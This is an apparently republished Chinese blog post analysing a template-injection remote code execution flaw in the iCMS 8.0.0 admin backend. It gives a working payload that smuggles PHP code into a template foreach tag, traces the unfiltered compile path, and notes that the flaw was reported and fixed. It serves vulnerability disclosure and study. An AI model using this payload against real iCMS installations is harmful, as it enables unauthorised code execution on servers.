ICMS 8.0.0后台模板注入导致远程代码执行0day漏洞分析
2023-06-13 09:14:15 时间
Author: 颖奇L’Amore
Blog: www.gem-love.com
前言▸
这个洞一年前就挖到了,然后2月份给了今年中旬比赛的XCTF Final(但是这个洞用不了因为题目需要RCE),因为比较久远,一直给忘记了。漏洞也是直接报给了开发者修复。
exploit▸
then upload 1.htm:
<font size=24px color=red>iCMS<=8.0.0 RCE</font>
<!--{foreach key=date value=alist from=1);phpinfo();/*?>}-->
Set template file to the htm file uploaded before
RCE:
Analyse▸
TemplateLite->_fetch_compile() calls
In the _compile_tag method, strict filtering is not performed, resulting in malicious code being injected into the template source code
go back to TemplateLite->_fetch_compile(), the template code injected with malicious code is written into the file and included, resulting in remote code execution
后记▸
还有一个RCE的洞,当时我做题目docker是用的官网的7.0.16,其实开发者早就更新到了8的版本。
7.0.16可以通过任意文件上传+更新patch包来getshell,这个也是注意到了,但是已在8.x不可用了,原因是通过Request::input()进行file_get_contents('php://input')并进行parse_str(),处理为数组后过不了md5()。所以这个洞不详细分析了。
相关文章
- IOS7爆后台漏洞 屏幕可被监控
- 渗透测试|Weblogic漏洞复现与修复
- WebLogic Console权限认证绕过漏洞(CVE-2020-14750)
- 某企业SRC的Alibaba Nacos 认证绕过漏洞实战
- 如何自己开发漏洞扫描工具视频_系统漏洞扫描工具有哪些
- CVE-2022-0847:Linux DirtyPipe内核提权漏洞
- ICMS 8.0.0后台任意文件读取0day漏洞分析
- phpStudy nginx 解析漏洞复现
- CVE-2019-2725 Weblogic 反序列化漏洞
- Java堆栈溢出漏洞分析
- TPM 2.0 爆出漏洞,数十亿物联网设备受到严重威胁!
- 实战|探究公众号接口漏洞:从后台登录口到旁站getshell
- Linux修复漏洞:让你的系统更安全(linux修复漏洞)